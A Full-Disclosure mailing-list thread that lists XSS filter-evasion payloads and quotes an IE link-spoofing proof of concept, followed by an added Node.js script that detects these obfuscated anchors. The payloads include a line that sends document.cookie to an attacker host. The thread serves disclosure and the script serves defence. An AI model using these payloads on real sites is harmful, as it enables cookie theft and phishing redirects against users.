You can then mix it with some classical XSS tricks like:

Basic XSS test detected:
<a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a>
<a href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'+document.cookie</script>">Click here</a>

Basic XSS test:
<a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a>

UTF-8:
<a href="javascript:alert('XSS')" title="http://www.google.com">hello</a>

Long UTF-8 Unicode encoding without semicolons:
<a href= javascript:alert('XSS') title="http://www.google.com" onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a>

Embedded newline to break up XSS:
<a href=jav
ascript:alert('XSS'); title="http://www.google.com" hover="http://www.google.com">hello2</a>

Embedded carriage return to break up XSS (doesn't appear as link):
<a href=jav
ascript:alert('XSS'); title="http://www.google.com" onmouseover="image(this.href);">hello3</a>

Inserting spaces in href link:
<a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a>

etc... some bypass the Opera anti-illegal-urls.

K-Gen Gen wrote:
> New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
>
> Gr337s .. I (K-Gen) have found a new (I think..) URL spoofing bug in IE.
>
> Affected : All MS-IE Browsers (Win XP SP2 as well).
>
> This allows a malicious website to host a specially crafted A HREF tag
> that shows to the user as a link to one location, but actually redirects
> to another. This can be used in Phishing scams and other malicious attacks.
>
> The basic idea here is to write a genuine <a href=""> </a> tag but
> include an onClick event handler that will redirect
> (window.location="";) to another page. The next example won't work:
>
> <a href="http://microsoft.com" onClick="window.location='http://google.com';">Microsoft</a>
>
> Probably there is some protection in IE .. but not enough :)
>
> If we try the next thing:
>
> <a href="http://microsoft.com" onClick="alert()">Microsoft</a>
>
> An alert WILL pop up before redirecting. The same thing will happen to
> the document.write(""); method, it will execute before redirection.
>
> Hence, the next Proof of Concept:
>
> <a href="http://microsoft.com" onClick="document.write(unescape('%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e'))">Microsoft</a>
>
> Put the code into an HTML page and see for yourself. In the status bar
> and in the properties the link appears as http://microsoft.com , but if
> you click on the link it will redirect you to http://google.com .
>
> I used unescape because characters like < > and ' cause run-time errors...
>
> This is not as critical as the old %01@ bug (That still works
> on my IE sp1 :lol:), because it does not obscure the real link in the
> Address bar, but I bet there will be a PoC for this one too, sooner or later...
>
> Have a Nice Day.
> K-Gen
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
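Added example, not code from the original post, from K-Gen, or from any project mentioned in the thread: a small Node.js audit that normalises an href the way a browser's URL parser does before it matches the scheme (decode character references, strip leading and trailing control characters and spaces, delete embedded tab, CR and LF, compare case-insensitively), so every obfuscated javascript: variant quoted above collapses to the same scheme. It separately flags an http(s) link that carries a click or mouse event handler, which is the shape of the IE proof of concept. The sample page, the numeric-entity variant and the handler list are assumptions made for the example, and the tag extraction is a simplified regex parser, not a real HTML parser.

```javascript
'use strict';
// Added example, not code from the original post or from K-Gen. It audits <a>
// tags the way a browser's URL parser ends up seeing them, so the obfuscated
// "javascript:" hrefs quoted in the thread and the benign-href-plus-onClick
// trick from the IE proof of concept both stand out. The tag and attribute
// extraction is a simplified regex parser written only for this example and
// is not a substitute for a real HTML parser.

const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };

// Decode numeric (&#106; &#x6A;) and a few named character references, with
// or without the trailing semicolon; anything unknown is left untouched.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1] === 'x' || body[1] === 'X';
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const v = NAMED_ENTITIES[body.toLowerCase()];
    return v === undefined ? match : v;
  });
}

// What a browser does to an href before matching the scheme: strip leading and
// trailing C0 controls and spaces, then delete TAB/CR/LF anywhere in the value.
function normalizeHref(raw) {
  return decodeEntities(raw)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\r\n]/g, '');
}

// Lower-cased scheme of a normalised href, or null for a relative URL.
function schemeOf(href) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(href);
  return m ? m[1].toLowerCase() : null;
}

// Attributes of one opening tag, in quoted, unquoted and bare (valueless) forms.
function parseAttrs(attrText) {
  const attrs = [];
  const re = /([^\s"'=<>`\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : (m[4] || '');
    attrs.push({ name: m[1].toLowerCase(), value });
  }
  return attrs;
}

// Handlers that can set window.location before the href is followed (assumed list).
const CLICK_HANDLERS = /^on(click|dblclick|mousedown|mouseup|mouseover|mouseout|keydown|keyup|keypress)$/;

// Walk every <a ...> opening tag and report what the status bar would not show.
function auditAnchors(html) {
  const findings = [];
  const tagRe = /<a\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const attrs = parseAttrs(t[1]);
    const hrefAttr = attrs.find((a) => a.name === 'href');
    const href = hrefAttr ? normalizeHref(hrefAttr.value) : '';
    const scheme = schemeOf(href);
    const handlers = attrs.filter((a) => CLICK_HANDLERS.test(a.name)).map((a) => a.name);
    const reasons = [];
    if (scheme === 'javascript') reasons.push('script-scheme:javascript');
    if ((scheme === 'http' || scheme === 'https') && handlers.length > 0) {
      reasons.push('handler-on-benign-href:' + handlers.join(','));
    }
    if (reasons.length > 0) findings.push({ tag: t[0], href, reasons });
  }
  return findings;
}

// Constructed sample page (no real site) built from the payload shapes in the
// thread, with the unquoted href values quoted so a standards-mode tokenizer
// keeps the whole value; the sixth line adds a numeric-entity variant.
const SAMPLE_HTML = [
  '<a href="http://www.google.com" title="plain">plain link</a>',
  '<a href="JaVaScRiPt:alert(\'XSS\')" title="http://www.google.com">hello0</a>',
  '<a href="jav\nascript:alert(\'XSS\');" title="http://www.google.com">hello2</a>',
  '<a href="jav\rascript:alert(\'XSS\');" title="http://www.google.com">hello3</a>',
  '<a href=" javascript:alert(\'XSS\');" title="http://www.google.com">hello4</a>',
  '<a href="&#106;avascript:alert(\'XSS\')">entity</a>',
  '<a href="http://microsoft.com" onClick="document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\'))">Microsoft</a>',
  '<a href="http://microsoft.com" onClick="alert()">Microsoft</a>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of auditAnchors(SAMPLE_HTML)) {
    console.log(f.reasons.join(' '), '->', f.tag.slice(0, 60));
  }
}
```

Run it with node to print one line per suspicious anchor. The point of normalizeHref() is that any allow-list or status-bar check has to compare the value after the browser's own normalisation, not the raw attribute text; the handler check is the complement, because an href that passes every scheme filter is still not what the user gets when an onClick fires first.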